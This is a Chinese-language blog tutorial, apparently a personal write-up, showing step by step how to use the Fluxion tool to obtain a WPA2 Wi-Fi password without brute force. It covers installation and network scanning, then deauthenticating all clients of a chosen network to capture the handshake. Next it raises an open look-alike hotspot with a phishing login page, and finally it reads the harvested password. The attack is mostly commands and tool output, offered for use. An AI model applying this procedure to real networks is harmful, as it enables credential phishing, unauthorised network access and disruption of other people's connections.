Hacking any WPA/WPA2 PSK without BruteForce

Fluxion is based on the programs such as aircrack-ng, mdk3, hostapd etc.

实验所需文件

准备条件

下载下来之后

┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $ls
add.py  airmon  arch-install  fluxion  Installer.sh  LICENSE  logos.zip  README.md  remove.py
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $chmod 777 *
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $apt-get update
┌─[✗]─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $sudo proxychains ./Installer.sh 

等待安装完成,完成标志,再次运行Installer.sh,结果如下

#########################################################
#                                                       #
#      FLUXION 2    < Fluxion Is The Future >           #
# by Deltax, Strasharo and ApatheticEuphoria            #
#                                                       #
#########################################################


Aircrack-ng.....OK!
Aireplay-ng.....OK!
Airodump-ng.....OK!
Bully...........OK!
Curl............OK!
Dhcpd...........OK!
Hostapd.........OK!
Iwconfig........OK!
Lighttpd........OK!
Macchanger......OK!
Mdk3............OK!
Nmap............OK!
Openssl.........OK!
Php-cgi........OK!
Pyrit...........OK!
Python..........OK!
Reaver..........OK!
rfkill..........OK!
Unzip...........OK!
Xterm...........OK!
Zenity..........OK!
strings..........OK!
fuser............OK!
./fluxion

实战

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


[i] Select your language
                                       
      [1] English          
      [2] German      
      [3] Romanian     
      [4] Turkish    
      [5] Spanish    
      [6] Chinese   
      [7] Italian   
      [8] Czech   
      [9] Greek   
                                       
[deltaxflux@fluxion]-[~]

这样即是运行成功,这里以English举例

[i] Select channel
                                       
      [1] All channels           
      [2] Specific channel(s)       
      [3] Back        
                                       
[deltaxflux@fluxion]-[~]1

选择1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


                        WIFI LIST 

 ID      MAC                      CHAN    SECU     PWR   ESSID

......

 [37]   90:94:xx:xx:xx:xx     11     WPA2     65%     theKingOfNight

......
 (*) Active clients

        Select target. For rescan type r

选择37

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


INFO WIFI

               SSID = theKingOfNight / WPA2
               Channel = 11
               Speed = 30 Mbps
               BSSID = 90:94:97:xx:xx:xx ( )

[i] Select Attack Option
                                       
      [1] FakeAP - Hostapd (Recommended)
      [2] FakeAP - airbase-ng (Slower connection)
      [3] WPS-SLAUGHTER - Bruteforce WPS Pin
      [4] Bruteforce - (Handshake is required)
      [5] Back 

选择1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


INFO WIFI

               SSID = theKingOfNight / WPA2
               Channel = 11
               Speed = 30 Mbps
               BSSID = 90:94:97:xx:xx:xx ( )


handshake location  (Example: /home/thekingofnight/Desktop/test/test.cap)
Press ENTER to skip

Path: 
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


[i] Handshake check
                                       
      [1] aircrack-ng (Miss chance)
      [2] pyrit
      [3] Back
                                       
[deltaxflux@fluxion]-[~]1
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


[i] *Capture Handshake*
                                       
      [1] Deauth all
      [2] Deauth all [mdk3]
      [3] Deauth target 
      [4] Rescan networks 
      [5] Exit
                                       
[deltaxflux@fluxion]-[~]1

使所有用户断开wifi,然后默认设备会自动重连wifi,也就给我们一个握手包。

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


[i] *Capture Handshake* 

Status handshake: 

      [1] Check handshake
      [2] Back (Select another deauth method)
      [3] Select another network
      [4] Exit
      #> 1
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


INFO WIFI

               SSID = theKingOfNight / WPA2
               Channel = 11
               Speed = 30 Mbps
               BSSID = 90:94:97:xx:xx:xx ( )


[i] Select your option

      [1] Web Interface
      [2] Bruteforce
      [3] Exit

#?1   
[i] Select Login Page

      [1]  English     [ENG]  (NEUTRA)
      [2]  German      [GER]  (NEUTRA)
      [3]  Russian     [RUS]  (NEUTRA)
      [4]  Italian     [IT]   (NEUTRA)
      [5]  Spanish     [ESP]  (NEUTRA)
      [6]  Portuguese  [POR]  (NEUTRA)
      [7]  Chinese     [CN]   (NEUTRA)
      [8]  French      [FR]   (NEUTRA)
      [9]  Turkish     [TR]   (NEUTRA)
      [10] Romanian    [RO]   (NEUTRA)
      [11] Hungarian   [HU]   (NEUTRA)
      [12] Arabic      [ARA]  (NEUTRA)
      [13] Greek       [GR]   (NEUTRA)
      [14] Czech       [CZ]   (NEUTRA)
      [15] Norwegian   [NO]   (NEUTRA)
      [16] Bulgarian   [BG]   (NEUTRA)
      [17] Serbia      [SRB]  (NEUTRA)
      [18] Polish      [PL]   (NEUTRA)
      [19] Indonesia   [ID]   (NEUTRA)
      [20] Dutch       [NL]   (NEUTRA)
      [21] Danish      [DAN]  (NEUTRA)
      [22] Hebrew      [HE]  (NEUTRA)
      [23] Thailand     [TH]  (NEUTRA)
      [24] Belkin      [ENG]
      [25] Netgear     [ENG]
      [26] Huawei      [ENG]
      [27] Verizon     [ENG]
      [28] Netgear     [ESP]
      [29] Arris       [ESP]
      [30] Vodafone    [ESP]
      [31] TP-Link     [ENG]
      [32] TP-Link     [ITA]
      [33] Back

#? 7

现在会出来一个名称一样的,开放的wifi热点,之前加密的已经连接不上了。


image.png

安全意识不高的人们会默认连接名称相同的开放热点

此时,链接上网络的设备使用浏览器或者app默认会跳转到如下界面


image.png

输入完成后,页面跳转为


image.png

手机端也类似


image.png

最后

┌─[root@parrot]─[/home/thekingofnight/Desktop/test/test]
└──╼ #cat /root/theKingOfNight-password.txt 

    FLUX 0.23 by deltax

    SSID: theKingOfNight
    BSSID: 90:94:xx:xx:xx:xx ()
    Channel: 11
    Security: WPA2
    Time: 00:15:16
    Password: 1234567890

一些坑

恢复网络的解决方法

┌─[✗]─[root@parrot]─[/home/thekingofnight]
└──╼ #ifconfig wlan0mon down
┌─[root@parrot]─[/home/thekingofnight]
└──╼ #iwconfig wlan0mon channel 11
┌─[root@parrot]─[/home/thekingofnight]
└──╼ #service network-manager start

Fluxion无法监听的解决方法

airmon-ng check kill
airmon-ng start wlan0

参考

https://www.youtube.com/watch?v=gwF2mcbmfKQ&list=PLjo33Hih06ps2dlJMflCU7tYA7dzk_xYl&index=29

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,425评论 4 361
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,058评论 1 291
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,186评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,848评论 0 204
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,249评论 3 286
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,554评论 1 216
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,830评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,536评论 0 197
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,239评论 1 241
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,505评论 2 244
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,004评论 1 258
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,346评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,999评论 3 235
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,060评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,821评论 0 194
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,574评论 2 271
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,480评论 2 267

推荐阅读更多精彩内容